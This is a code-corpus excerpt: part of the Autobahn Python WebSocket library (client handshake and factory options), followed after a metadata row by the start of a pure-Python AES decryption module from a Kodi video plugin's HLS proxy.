:type autoFragmentSize: int
:param failByDrop: Fail connections by dropping the TCP connection without performing the closing handshake (default: True).
:type failByDrop: bool
:param echoCloseCodeReason: Iff true, when receiving a close, echo back close code/reason. Otherwise reply with code == NORMAL, reason = "" (default: False).
:type echoCloseCodeReason: bool
:param openHandshakeTimeout: Opening WebSocket handshake timeout, timeout in seconds or 0 to deactivate (default: 5).
:type openHandshakeTimeout: float
:param closeHandshakeTimeout: When we expect to receive a closing handshake reply, timeout in seconds (default: 1).
:type closeHandshakeTimeout: float
:param tcpNoDelay: TCP NODELAY ("Nagle") socket option (default: True).
:type tcpNoDelay: bool
"""
if allowHixie76 is not None and allowHixie76 != self.allowHixie76:
self.allowHixie76 = allowHixie76
if versions is not None:
for v in versions:
if v not in WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS:
raise Exception("invalid WebSockets protocol version %s (allowed values: %s)" % (v, str(WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS)))
if v == 0 and not self.allowHixie76:
raise Exception("use of Hixie-76 requires allowHixie76 == True")
if set(versions) != set(self.versions):
self.versions = versions
if webStatus is not None and webStatus != self.webStatus:
self.webStatus = webStatus
if utf8validateIncoming is not None and utf8validateIncoming != self.utf8validateIncoming:
self.utf8validateIncoming = utf8validateIncoming
if requireMaskedClientFrames is not None and requireMaskedClientFrames != self.requireMaskedClientFrames:
self.requireMaskedClientFrames = requireMaskedClientFrames
if maskServerFrames is not None and maskServerFrames != self.maskServerFrames:
self.maskServerFrames = maskServerFrames
if applyMask is not None and applyMask != self.applyMask:
self.applyMask = applyMask
if maxFramePayloadSize is not None and maxFramePayloadSize != self.maxFramePayloadSize:
self.maxFramePayloadSize = maxFramePayloadSize
if maxMessagePayloadSize is not None and maxMessagePayloadSize != self.maxMessagePayloadSize:
self.maxMessagePayloadSize = maxMessagePayloadSize
if autoFragmentSize is not None and autoFragmentSize != self.autoFragmentSize:
self.autoFragmentSize = autoFragmentSize
if failByDrop is not None and failByDrop != self.failByDrop:
self.failByDrop = failByDrop
if echoCloseCodeReason is not None and echoCloseCodeReason != self.echoCloseCodeReason:
self.echoCloseCodeReason = echoCloseCodeReason
if openHandshakeTimeout is not None and openHandshakeTimeout != self.openHandshakeTimeout:
self.openHandshakeTimeout = openHandshakeTimeout
if closeHandshakeTimeout is not None and closeHandshakeTimeout != self.closeHandshakeTimeout:
self.closeHandshakeTimeout = closeHandshakeTimeout
if tcpNoDelay is not None and tcpNoDelay != self.tcpNoDelay:
self.tcpNoDelay = tcpNoDelay
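## Usage sketch (illustrative option values, not part of the original module):
##
## factory.setProtocolOptions(allowHixie76 = True,
## versions = [0, 8, 13],
## autoFragmentSize = 65536)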
def getConnectionCount(self):
"""
Get number of currently connected clients.
:returns: int -- Number of currently connected clients.
"""
return self.countConnections
def startFactory(self):
"""
Called by Twisted before starting to listen on port for incoming connections.
Default implementation does nothing. Override in derived class when appropriate.
"""
pass
def stopFactory(self):
"""
Called by Twisted before stopping to listen on port for incoming connections.
Default implementation does nothing. Override in derived class when appropriate.
"""
pass
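## End-to-end usage sketch (assumed names; `EchoServerProtocol` is a
## hypothetical subclass of WebSocketServerProtocol):
##
## from twisted.internet import reactor
## factory = WebSocketServerFactory("ws://localhost:9000", debug = False)
## factory.protocol = EchoServerProtocol
## reactor.listenTCP(9000, factory)
## reactor.run()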
class WebSocketClientProtocol(WebSocketProtocol):
"""
Client protocol for WebSockets.
"""
def onConnect(self, connectionResponse):
"""
Callback fired directly after WebSocket opening handshake when new WebSocket server
connection was established.
:param connectionResponse: WebSocket connection response information.
:type connectionResponse: instance of :class:`autobahn.websocket.ConnectionResponse`
"""
pass
def connectionMade(self):
"""
Called by Twisted when new TCP connection to server was established. Default
implementation will start the initial WebSocket opening handshake.
When overriding in derived class, make sure to call this base class
implementation _before_ your code.
"""
self.isServer = False
WebSocketProtocol.connectionMade(self)
if self.debug:
log.msg("connection to %s established" % self.peerstr)
self.startHandshake()
def connectionLost(self, reason):
"""
Called by Twisted when established TCP connection to server was lost. Default
implementation will tear down all state properly.
When overriding in derived class, make sure to call this base class
implementation _after_ your code.
"""
WebSocketProtocol.connectionLost(self, reason)
if self.debug:
log.msg("connection to %s lost" % self.peerstr)
def createHixieKey(self):
"""
Supposed to implement the crack smoker algorithm below. Well, crack
probably wasn't the stuff they smoked - dog poo?
http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76#page-21
Items 16 - 22
"""
spaces1 = random.randint(1, 12)
max1 = int(4294967295L / spaces1)
number1 = random.randint(0, max1)
product1 = number1 * spaces1
key1 = str(product1)
rchars = filter(lambda x: (x >= 0x21 and x <= 0x2f) or (x >= 0x3a and x <= 0x7e), range(0,127))
for i in xrange(random.randint(1, 12)):
p = random.randint(0, len(key1) - 1)
key1 = key1[:p] + chr(random.choice(rchars)) + key1[p:]
for i in xrange(spaces1):
p = random.randint(1, len(key1) - 2)
key1 = key1[:p] + ' ' + key1[p:]
return (key1, number1)
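## Worked example (illustrative values): with spaces1 = 3 and number1 = 42,
## product1 = 126, giving a key such as "s1 2 x6 y" (digits "126", 3 spaces).
## The server recovers number1 via int("126") / 3 == 42, see
## WebSocketServerProtocol.parseHixie76Key().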
def startHandshake(self):
"""
Start WebSockets opening handshake.
"""
## construct WS opening handshake HTTP header
##
request = "GET %s HTTP/1.1\x0d\x0a" % self.factory.resource.encode("utf-8")
if self.factory.useragent is not None and self.factory.useragent != "":
request += "User-Agent: %s\x0d\x0a" % self.factory.useragent.encode("utf-8")
request += "Host: %s:%d\x0d\x0a" % (self.factory.host.encode("utf-8"), self.factory.port)
request += "Upgrade: WebSocket\x0d\x0a"
request += "Connection: Upgrade\x0d\x0a"
## handshake random key
##
if self.version == 0:
(self.websocket_key1, number1) = self.createHixieKey()
(self.websocket_key2, number2) = self.createHixieKey()
self.websocket_key3 = os.urandom(8)
accept_val = struct.pack(">II", number1, number2) + self.websocket_key3
self.websocket_expected_challenge_response = hashlib.md5(accept_val).digest()
request += "Sec-WebSocket-Key1: %s\x0d\x0a" % self.websocket_key1
request += "Sec-WebSocket-Key2: %s\x0d\x0a" % self.websocket_key2
else:
self.websocket_key = base64.b64encode(os.urandom(16))
request += "Sec-WebSocket-Key: %s\x0d\x0a" % self.websocket_key
## optional origin announced
##
if self.factory.origin:
if self.version > 10 or self.version == 0:
request += "Origin: %d\x0d\x0a" % self.factory.origin.encode("utf-8")
else:
request += "Sec-WebSocket-Origin: %d\x0d\x0a" % self.factory.origin.encode("utf-8")
## optional list of WS subprotocols announced
##
if len(self.factory.protocols) > 0:
request += "Sec-WebSocket-Protocol: %s\x0d\x0a" % ','.join(self.factory.protocols)
## set WS protocol version depending on WS spec version
##
if self.version != 0:
request += "Sec-WebSocket-Version: %d\x0d\x0a" % WebSocketProtocol.SPEC_TO_PROTOCOL_VERSION[self.version]
request += "\x0d\x0a"
if self.version == 0:
request += self.websocket_key3
self.http_request_data = request
if self.debug:
log.msg(self.http_request_data)
self.sendData(self.http_request_data)
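## Example of the (Hybi) opening handshake request produced above, with
## illustrative values:
##
## GET /chat HTTP/1.1
## User-Agent: AutobahnPython/x.x.x
## Host: localhost:9000
## Upgrade: WebSocket
## Connection: Upgrade
## Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
## Sec-WebSocket-Protocol: chat
## Sec-WebSocket-Version: 13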
def processHandshake(self):
"""
Process WebSockets opening handshake response from server.
"""
## only proceed when we have fully received the HTTP request line and all headers
##
end_of_header = self.data.find("\x0d\x0a\x0d\x0a")
if end_of_header >= 0:
self.http_response_data = self.data[:end_of_header + 4]
if self.debug:
log.msg("received HTTP response:\n\n%s\n\n" % self.http_response_data)
## extract HTTP status line and headers
##
(self.http_status_line, self.http_headers, http_headers_cnt) = parseHttpHeader(self.http_response_data)
## validate WebSocket opening handshake server response
##
if self.debug:
log.msg("received HTTP status line in opening handshake : %s" % str(self.http_status_line))
log.msg("received HTTP headers in opening handshake : %s" % str(self.http_headers))
## Response Line
##
sl = self.http_status_line.split()
if len(sl) < 2:
return self.failHandshake("Bad HTTP response status line '%s'" % self.http_status_line)
## HTTP version
##
http_version = sl[0].strip()
if http_version != "HTTP/1.1":
return self.failHandshake("Unsupported HTTP version ('%s')" % http_version)
## HTTP status code
##
try:
status_code = int(sl[1].strip())
except:
return self.failHandshake("Bad HTTP status code ('%s')" % sl[1].strip())
if status_code != HTTP_STATUS_CODE_SWITCHING_PROTOCOLS[0]:
## FIXME: handle redirects
## FIXME: handle authentication required
if len(sl) > 2:
reason = " - %s" % sl[2].strip()
else:
reason = ""
return self.failHandshake("WebSockets connection upgrade failed (%d%s)" % (status_code, reason))
## Upgrade
##
if not self.http_headers.has_key("upgrade"):
return self.failHandshake("HTTP Upgrade header missing")
if self.http_headers["upgrade"].strip().lower() != "websocket":
return self.failHandshake("HTTP Upgrade header different from 'websocket' (case-insensitive) : %s" % self.http_headers["upgrade"])
## Connection
##
if not self.http_headers.has_key("connection"):
return self.failHandshake("HTTP Connection header missing")
connectionUpgrade = False
for c in self.http_headers["connection"].split(","):
if c.strip().lower() == "upgrade":
connectionUpgrade = True
break
if not connectionUpgrade:
return self.failHandshake("HTTP Connection header does not include 'upgrade' value (case-insensitive) : %s" % self.http_headers["connection"])
## compute Sec-WebSocket-Accept
##
if self.version != 0:
if not self.http_headers.has_key("sec-websocket-accept"):
return self.failHandshake("HTTP Sec-WebSocket-Accept header missing in opening handshake reply")
else:
if http_headers_cnt["sec-websocket-accept"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Accept header appears more than once in opening handshake reply")
sec_websocket_accept_got = self.http_headers["sec-websocket-accept"].strip()
sha1 = hashlib.sha1()
sha1.update(self.websocket_key + WebSocketProtocol.WS_MAGIC)
sec_websocket_accept = base64.b64encode(sha1.digest())
if sec_websocket_accept_got != sec_websocket_accept:
return self.failHandshake("HTTP Sec-WebSocket-Accept bogus value : expected %s / got %s" % (sec_websocket_accept, sec_websocket_accept_got))
## handle "extensions in use" - if any
##
self.websocket_extensions_in_use = []
if self.version != 0:
if self.http_headers.has_key("sec-websocket-extensions"):
if http_headers_cnt["sec-websocket-extensions"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Extensions header appears more than once in opening handshake reply")
exts = self.http_headers["sec-websocket-extensions"].strip()
##
## we don't support any extension, but if we did, we needed
## to set self.websocket_extensions_in_use here, and don't fail the handshake
##
return self.failHandshake("server wants to use extensions (%s), but no extensions implemented" % exts)
## handle "subprotocol in use" - if any
##
self.websocket_protocol_in_use = None
if self.http_headers.has_key("sec-websocket-protocol"):
if http_headers_cnt["sec-websocket-protocol"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Protocol header appears more than once in opening handshake reply")
sp = str(self.http_headers["sec-websocket-protocol"].strip())
if sp != "":
if sp not in self.factory.protocols:
return self.failHandshake("subprotocol selected by server (%s) not in subprotocol list requested by client (%s)" % (sp, str(self.factory.protocols)))
else:
## ok, subprotocol in use
##
self.websocket_protocol_in_use = sp
## For Hixie-76, we need 16 octets of HTTP request body to complete HS!
##
if self.version == 0:
if len(self.data) < end_of_header + 4 + 16:
return
else:
challenge_response = self.data[end_of_header + 4:end_of_header + 4 + 16]
if challenge_response != self.websocket_expected_challenge_response:
return self.failHandshake("invalid challenge response received from server (Hixie-76)")
## Ok, got complete HS input, remember rest (if any)
##
if self.version == 0:
self.data = self.data[end_of_header + 4 + 16:]
else:
self.data = self.data[end_of_header + 4:]
## opening handshake completed, move WebSockets connection into OPEN state
##
self.state = WebSocketProtocol.STATE_OPEN
self.inside_message = False
if self.version != 0:
self.current_frame = None
self.websocket_version = self.version
## we handle this symmetrically to the server side .. that is, give the
## client a chance to bail out .. e.g. when no subprotocol was selected
## by the server
try:
connectionResponse = ConnectionResponse(self.peer,
self.peerstr,
self.http_headers,
None, # FIXME
self.websocket_protocol_in_use,
self.websocket_extensions_in_use)
self.onConnect(connectionResponse)
except Exception, e:
## immediately close the WS connection
##
self.failConnection(1000, str(e))
else:
## fire handler on derived class
##
self.onOpen()
## process rest, if any
##
if len(self.data) > 0:
self.consumeData()
def failHandshake(self, reason):
"""
During opening handshake the server response is invalid and we drop the
connection.
"""
if self.debug:
log.msg("failing WebSockets opening handshake ('%s')" % reason)
self.dropConnection(abort = True)
class WebSocketClientFactory(protocol.ClientFactory, WebSocketFactory):
"""
A Twisted factory for WebSockets client protocols.
"""
protocol = WebSocketClientProtocol
"""
The protocol to be spoken. Must be derived from :class:`autobahn.websocket.WebSocketClientProtocol`.
"""
def __init__(self,
## WebSocket session parameters
url = None,
origin = None,
protocols = [],
useragent = "AutobahnPython/%s" % autobahn.version,
## debugging
debug = False,
debugCodePaths = False):
"""
Create instance of WebSocket client factory.
Note that you MUST set URL either here or using setSessionParameters() _before_ the factory is started.
:param url: WebSocket URL to connect to - ("ws:" | "wss:") "//" host [ ":" port ] path [ "?" query ].
:type url: str
:param origin: The origin to be sent in WebSockets opening handshake or None (default: None).
:type origin: str
:param protocols: List of subprotocols the client should announce in WebSockets opening handshake (default: []).
:type protocols: list of strings
:param useragent: User agent as announced in HTTP request header or None (default: "AutobahnPython/x.x.x").
:type useragent: str
:param debug: Debug mode (default: False).
:type debug: bool
:param debugCodePaths: Debug code paths mode (default: False).
:type debugCodePaths: bool
"""
self.debug = debug
self.debugCodePaths = debugCodePaths
self.logOctets = debug
self.logFrames = debug
self.isServer = False
## seed RNG which is used for WS opening handshake key and WS frame masks generation
random.seed()
## default WS session parameters
##
self.setSessionParameters(url, origin, protocols, useragent)
## default WebSocket protocol options
##
self.resetProtocolOptions()
def setSessionParameters(self, url = None, origin = None, protocols = [], useragent = None):
"""
Set WebSocket session parameters.
:param url: WebSocket URL to connect to - ("ws:" | "wss:") "//" host [ ":" port ] path [ "?" query ].
:type url: str
:param origin: The origin to be sent in opening handshake.
:type origin: str
:param protocols: List of WebSocket subprotocols the client should announce in opening handshake.
:type protocols: list of strings
:param useragent: User agent as announced in HTTP request header during opening handshake.
:type useragent: str
"""
if url is not None:
## parse WebSocket URI into components
(isSecure, host, port, resource, path, params) = parseWsUrl(url)
self.url = url
self.isSecure = isSecure
self.host = host
self.port = port
self.resource = resource
self.path = path
self.params = params
else:
self.url = None
self.isSecure = None
self.host = None
self.port = None
self.resource = None
self.path = None
self.params = None
self.origin = origin
self.protocols = protocols
self.useragent = useragent
def resetProtocolOptions(self):
"""
Reset all WebSocket protocol options to defaults.
"""
self.version = WebSocketProtocol.DEFAULT_SPEC_VERSION
self.allowHixie76 = WebSocketProtocol.DEFAULT_ALLOW_HIXIE76
self.utf8validateIncoming = True
self.acceptMaskedServerFrames = False
self.maskClientFrames = True
self.applyMask = True
self.maxFramePayloadSize = 0
self.maxMessagePayloadSize = 0
self.autoFragmentSize = 0
self.failByDrop = True
self.echoCloseCodeReason = False
self.serverConnectionDropTimeout = 1
self.openHandshakeTimeout = 5
self.closeHandshakeTimeout = 1
self.tcpNoDelay = True
def setProtocolOptions(self,
version = None,
allowHixie76 = None,
utf8validateIncoming = None,
acceptMaskedServerFrames = None,
maskClientFrames = None,
applyMask = None,
maxFramePayloadSize = None,
maxMessagePayloadSize = None,
autoFragmentSize = None,
failByDrop = None,
echoCloseCodeReason = None,
serverConnectionDropTimeout = None,
openHandshakeTimeout = None,
closeHandshakeTimeout = None,
tcpNoDelay = None):
"""
Set WebSocket protocol options used as defaults for _new_ protocol instances.
:param version: The WebSockets protocol spec (draft) version to be used (default: WebSocketProtocol.DEFAULT_SPEC_VERSION).
:type version: int
:param allowHixie76: Allow the Hixie76 protocol version to be spoken.
:type allowHixie76: bool
:param utf8validateIncoming: Validate incoming UTF-8 in text message payloads (default: True).
:type utf8validateIncoming: bool
:param acceptMaskedServerFrames: Accept masked server-to-client frames (default: False).
:type acceptMaskedServerFrames: bool
:param maskClientFrames: Mask client-to-server frames (default: True).
:type maskClientFrames: bool
:param applyMask: Actually apply mask to payload when a mask is present. Applies to outgoing and incoming frames (default: True).
:type applyMask: bool
:param maxFramePayloadSize: Maximum frame payload size that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxFramePayloadSize: int
:param maxMessagePayloadSize: Maximum message payload size (after reassembly of fragmented messages) that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxMessagePayloadSize: int
:param autoFragmentSize: Automatic fragmentation of outgoing data messages (when using the message-based API) into frames with payload length <= this size or 0 for no auto-fragmentation (default: 0).
:type autoFragmentSize: int
:param failByDrop: Fail connections by dropping the TCP connection without performing closing handshake (default: True).
:type failByDrop: bool
:param echoCloseCodeReason: Iff true, when receiving a close, echo back close code/reason. Otherwise reply with code == NORMAL, reason = "" (default: False).
:type echoCloseCodeReason: bool
:param serverConnectionDropTimeout: When the client expects the server to drop the TCP, timeout in seconds (default: 1).
:type serverConnectionDropTimeout: float
:param openHandshakeTimeout: Opening WebSocket handshake timeout, timeout in seconds or 0 to deactivate (default: 5).
:type openHandshakeTimeout: float
:param closeHandshakeTimeout: When we expect to receive a closing handshake reply, timeout in seconds (default: 1).
:type closeHandshakeTimeout: float
:param tcpNoDelay: TCP NODELAY ("Nagle") socket option (default: True).
:type tcpNoDelay: bool
"""
if allowHixie76 is not None and allowHixie76 != self.allowHixie76:
self.allowHixie76 = allowHixie76
if version is not None:
if version not in WebSocketProtocol.SUPPORTED_SPEC_VERSIONS:
raise Exception("invalid WebSockets draft version %s (allowed values: %s)" % (version, str(WebSocketProtocol.SUPPORTED_SPEC_VERSIONS)))
if version == 0 and not self.allowHixie76:
raise Exception("use of Hixie-76 requires allowHixie76 == True")
if version != self.version:
self.version = version
if utf8validateIncoming is not None and utf8validateIncoming != self.utf8validateIncoming:
self.utf8validateIncoming = utf8validateIncoming
if acceptMaskedServerFrames is not None and acceptMaskedServerFrames != self.acceptMaskedServerFrames:
self.acceptMaskedServerFrames = acceptMaskedServerFrames
if maskClientFrames is not None and maskClientFrames != self.maskClientFrames:
self.maskClientFrames = maskClientFrames
if applyMask is not None and applyMask != self.applyMask:
self.applyMask = applyMask
if maxFramePayloadSize is not None and maxFramePayloadSize != self.maxFramePayloadSize:
self.maxFramePayloadSize = maxFramePayloadSize
if maxMessagePayloadSize is not None and maxMessagePayloadSize != self.maxMessagePayloadSize:
self.maxMessagePayloadSize = maxMessagePayloadSize
if autoFragmentSize is not None and autoFragmentSize != self.autoFragmentSize:
self.autoFragmentSize = autoFragmentSize
if failByDrop is not None and failByDrop != self.failByDrop:
self.failByDrop = failByDrop
if echoCloseCodeReason is not None and echoCloseCodeReason != self.echoCloseCodeReason:
self.echoCloseCodeReason = echoCloseCodeReason
if serverConnectionDropTimeout is not None and serverConnectionDropTimeout != self.serverConnectionDropTimeout:
self.serverConnectionDropTimeout = serverConnectionDropTimeout
if openHandshakeTimeout is not None and openHandshakeTimeout != self.openHandshakeTimeout:
self.openHandshakeTimeout = openHandshakeTimeout
if closeHandshakeTimeout is not None and closeHandshakeTimeout != self.closeHandshakeTimeout:
self.closeHandshakeTimeout = closeHandshakeTimeout
if tcpNoDelay is not None and tcpNoDelay != self.tcpNoDelay:
self.tcpNoDelay = tcpNoDelay
def clientConnectionFailed(self, connector, reason):
"""
Called by Twisted when the connection to server has failed. Default implementation
does nothing. Override in derived class when appropriate.
"""
pass
def clientConnectionLost(self, connector, reason):
"""
Called by Twisted when the connection to server was lost. Default implementation
does nothing. Override in derived class when appropriate.
"""
pass
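## Usage sketch (assumed names; `EchoClientProtocol` is a hypothetical
## subclass of WebSocketClientProtocol):
##
## from twisted.internet import reactor
## factory = WebSocketClientFactory("ws://localhost:9000")
## factory.protocol = EchoClientProtocol
## reactor.connectTCP("localhost", 9000, factory)
## reactor.run()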
| apache-2.0 | 1,140,141,229,421,386,400 | 36.960267 | 212 | 0.603311 | false |
bruno-briner/plugin.video.brplay | resources/lib/hlsproxy/decrypter.py | 1 | 16632 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Simple AES cipher implementation in pure Python following PEP-272 API
Based on: https://bitbucket.org/intgr/pyaes/, adapted to be compatible with PEP-8.
The goal of this module is to be as fast as reasonable in Python while still
being Pythonic and readable/understandable. It is licensed under the permissive
MIT license.
Hopefully the code is readable and commented enough that it can serve as an
introduction to the AES cipher for Python coders. In fact, it should go along
well with the Stick Figure Guide to AES:
http://www.moserware.com/2009/09/stick-figure-guide-to-advanced.html
Contrary to intuition, this implementation numbers the 4x4 matrices from top to
bottom for efficiency reasons::
0 4 8 12
1 5 9 13
2 6 10 14
3 7 11 15
Effectively it's the transposition of what you'd expect. This actually makes
the code simpler -- except the ShiftRows step, but hopefully the explanation
there clears it up.
"""
####
# Copyright (c) 2010 Marti Raudsepp <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
####
from array import array
# Globals mandated by PEP 272:
# http://www.python.org/dev/peps/pep-0272/
MODE_ECB = 1
MODE_CBC = 2
#MODE_CTR = 6
block_size = 16
# variable length key: 16, 24 or 32 bytes
key_size = None
class AESDecrypter():
MODE_CBC=2
def new(self, key, mode, IV=None):
if mode == MODE_ECB:
return ECBMode(AES(key))
elif mode == MODE_CBC:
if IV is None:
raise ValueError("CBC mode needs an IV value!")
return CBCMode(AES(key), IV)
else:
raise NotImplementedError
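# Usage sketch (illustrative values; Python 2 byte strings): decrypting an
# AES-128-CBC encrypted buffer whose length is a multiple of 16, e.g. an HLS
# media segment. `key`, `iv` and `ciphertext` below are hypothetical inputs.
#
# key = '0123456789abcdef' # 16-byte key
# iv = '\x00' * 16 # 16-byte initialization vector
# cipher = AESDecrypter().new(key, AESDecrypter.MODE_CBC, iv)
# plaintext = cipher.decrypt(ciphertext) # len(ciphertext) % 16 == 0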
#### AES cipher implementation
class AES(object):
block_size = 16
def __init__(self, key):
self.setkey(key)
def setkey(self, key):
"""Sets the key and performs key expansion."""
self.key = key
self.key_size = len(key)
if self.key_size == 16:
self.rounds = 10
elif self.key_size == 24:
self.rounds = 12
elif self.key_size == 32:
self.rounds = 14
else:
raise ValueError("Key length must be 16, 24 or 32 bytes")
self.expand_key()
def expand_key(self):
"""Performs AES key expansion on self.key and stores in self.exkey"""
# The key schedule specifies how parts of the key are fed into the
# cipher's round functions. "Key expansion" means performing this
# schedule in advance. Almost all implementations do this.
#
# Here's a description of AES key schedule:
# http://en.wikipedia.org/wiki/Rijndael_key_schedule
# The expanded key starts with the actual key itself
exkey = array('B', self.key)
# extra key expansion steps
if self.key_size == 16:
extra_cnt = 0
elif self.key_size == 24:
extra_cnt = 2
else:
extra_cnt = 3
# 4-byte temporary variable for key expansion
word = exkey[-4:]
# Each expansion cycle uses 'i' once for Rcon table lookup
for i in xrange(1, 11):
#### key schedule core:
# left-rotate by 1 byte
word = word[1:4] + word[0:1]
# apply S-box to all bytes
for j in xrange(4):
word[j] = aes_sbox[word[j]]
# apply the Rcon table to the leftmost byte
word[0] ^= aes_Rcon[i]
#### end key schedule core
for z in xrange(4):
for j in xrange(4):
# mix in bytes from the last subkey
word[j] ^= exkey[-self.key_size + j]
exkey.extend(word)
# Last key expansion cycle always finishes here
if len(exkey) >= (self.rounds + 1) * self.block_size:
break
# Special substitution step for 256-bit key
if self.key_size == 32:
for j in xrange(4):
# mix in bytes from the last subkey XORed with S-box of
# current word bytes
word[j] = aes_sbox[word[j]] ^ exkey[-self.key_size + j]
exkey.extend(word)
# Twice for 192-bit key, thrice for 256-bit key
for z in xrange(extra_cnt):
for j in xrange(4):
# mix in bytes from the last subkey
word[j] ^= exkey[-self.key_size + j]
exkey.extend(word)
self.exkey = exkey
def add_round_key(self, block, round):
"""AddRoundKey step. This is where the key is mixed into plaintext"""
offset = round * 16
exkey = self.exkey
for i in xrange(16):
block[i] ^= exkey[offset + i]
#print 'AddRoundKey:', block
def sub_bytes(self, block, sbox):
"""
SubBytes step, apply S-box to all bytes
Depending on whether encrypting or decrypting, a different sbox array
is passed in.
"""
for i in xrange(16):
block[i] = sbox[block[i]]
#print 'SubBytes :', block
def shift_rows(self, b):
"""
ShiftRows step in AES.
Shifts 2nd row to left by 1, 3rd row by 2, 4th row by 3
Since we're performing this on a transposed matrix, cells are numbered
from top to bottom first::
0 4 8 12 -> 0 4 8 12 -- 1st row doesn't change
1 5 9 13 -> 5 9 13 1 -- row shifted to left by 1 (wraps around)
2 6 10 14 -> 10 14 2 6 -- shifted by 2
3 7 11 15 -> 15 3 7 11 -- shifted by 3
"""
b[1], b[5], b[9], b[13] = b[5], b[9], b[13], b[1]
b[2], b[6], b[10], b[14] = b[10], b[14], b[2], b[6]
b[3], b[7], b[11], b[15] = b[15], b[3], b[7], b[11]
#print 'ShiftRows :', b
def shift_rows_inv(self, b):
"""
Similar to shift_rows above, but performed in inverse for decryption.
"""
b[5], b[9], b[13], b[1] = b[1], b[5], b[9], b[13]
b[10], b[14], b[2], b[6] = b[2], b[6], b[10], b[14]
b[15], b[3], b[7], b[11] = b[3], b[7], b[11], b[15]
#print 'ShiftRows :', b
def mix_columns(self, block):
"""MixColumns step. Mixes the values in each column"""
# Cache global multiplication tables (see below)
mul_by_2 = gf_mul_by_2
mul_by_3 = gf_mul_by_3
# Since we're dealing with a transposed matrix, columns are already
# sequential
for col in xrange(0, 16, 4):
v0, v1, v2, v3 = block[col:col + 4]
block[col] = mul_by_2[v0] ^ v3 ^ v2 ^ mul_by_3[v1]
block[col + 1] = mul_by_2[v1] ^ v0 ^ v3 ^ mul_by_3[v2]
block[col + 2] = mul_by_2[v2] ^ v1 ^ v0 ^ mul_by_3[v3]
block[col + 3] = mul_by_2[v3] ^ v2 ^ v1 ^ mul_by_3[v0]
#print 'MixColumns :', block
def mix_columns_inv(self, block):
"""
Similar to mix_columns above, but performed in inverse for decryption.
"""
# Cache global multiplication tables (see below)
mul_9 = gf_mul_by_9
mul_11 = gf_mul_by_11
mul_13 = gf_mul_by_13
mul_14 = gf_mul_by_14
# Since we're dealing with a transposed matrix, columns are already
# sequential
for col in xrange(0, 16, 4):
v0, v1, v2, v3 = block[col:col + 4]
block[col] = mul_14[v0] ^ mul_9[v3] ^ mul_13[v2] ^ mul_11[v1]
block[col + 1] = mul_14[v1] ^ mul_9[v0] ^ mul_13[v3] ^ mul_11[v2]
block[col + 2] = mul_14[v2] ^ mul_9[v1] ^ mul_13[v0] ^ mul_11[v3]
block[col + 3] = mul_14[v3] ^ mul_9[v2] ^ mul_13[v1] ^ mul_11[v0]
#print 'MixColumns :', block
def encrypt_block(self, block):
"""Encrypts a single block. This is the main AES function"""
# For efficiency reasons, the state between steps is transmitted via a
# mutable array, not returned
self.add_round_key(block, 0)
for round in xrange(1, self.rounds):
self.sub_bytes(block, aes_sbox)
self.shift_rows(block)
self.mix_columns(block)
self.add_round_key(block, round)
self.sub_bytes(block, aes_sbox)
self.shift_rows(block)
# no mix_columns step in the last round
self.add_round_key(block, self.rounds)
def decrypt_block(self, block):
"""Decrypts a single block. This is the main AES decryption function"""
# For efficiency reasons, the state between steps is transmitted via a
# mutable array, not returned
self.add_round_key(block, self.rounds)
# count rounds down from (self.rounds) ... 1
for round in xrange(self.rounds - 1, 0, -1):
self.shift_rows_inv(block)
self.sub_bytes(block, aes_inv_sbox)
self.add_round_key(block, round)
self.mix_columns_inv(block)
self.shift_rows_inv(block)
self.sub_bytes(block, aes_inv_sbox)
self.add_round_key(block, 0)
# no mix_columns step in the last round
#### ECB mode implementation
class ECBMode(object):
"""Electronic CodeBook (ECB) mode encryption.
Basically this mode applies the cipher function to each block individually;
no feedback is done. NB! This is insecure for almost all purposes
"""
def __init__(self, cipher):
self.cipher = cipher
self.block_size = cipher.block_size
def ecb(self, data, block_func):
"""Perform ECB mode with the given function"""
if len(data) % self.block_size != 0:
raise ValueError("Input length must be multiple of 16")
block_size = self.block_size
data = array('B', data)
for offset in xrange(0, len(data), block_size):
block = data[offset:offset + block_size]
block_func(block)
data[offset:offset + block_size] = block
return data.tostring()
def encrypt(self, data):
"""Encrypt data in ECB mode"""
return self.ecb(data, self.cipher.encrypt_block)
def decrypt(self, data):
"""Decrypt data in ECB mode"""
return self.ecb(data, self.cipher.decrypt_block)
#### CBC mode
class CBCMode(object):
"""
Cipher Block Chaining(CBC) mode encryption. This mode avoids content leaks.
In CBC encryption, each plaintext block is XORed with the ciphertext block
preceding it; decryption is simply the inverse.
"""
# A better explanation of CBC can be found here:
    # http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation#Cipher-block_chaining_.28CBC.29
def __init__(self, cipher, IV):
self.cipher = cipher
self.block_size = cipher.block_size
self.IV = array('B', IV)
def encrypt(self, data):
"""Encrypt data in CBC mode"""
block_size = self.block_size
if len(data) % block_size != 0:
raise ValueError("Plaintext length must be multiple of 16")
data = array('B', data)
IV = self.IV
for offset in xrange(0, len(data), block_size):
block = data[offset:offset + block_size]
# Perform CBC chaining
for i in xrange(block_size):
block[i] ^= IV[i]
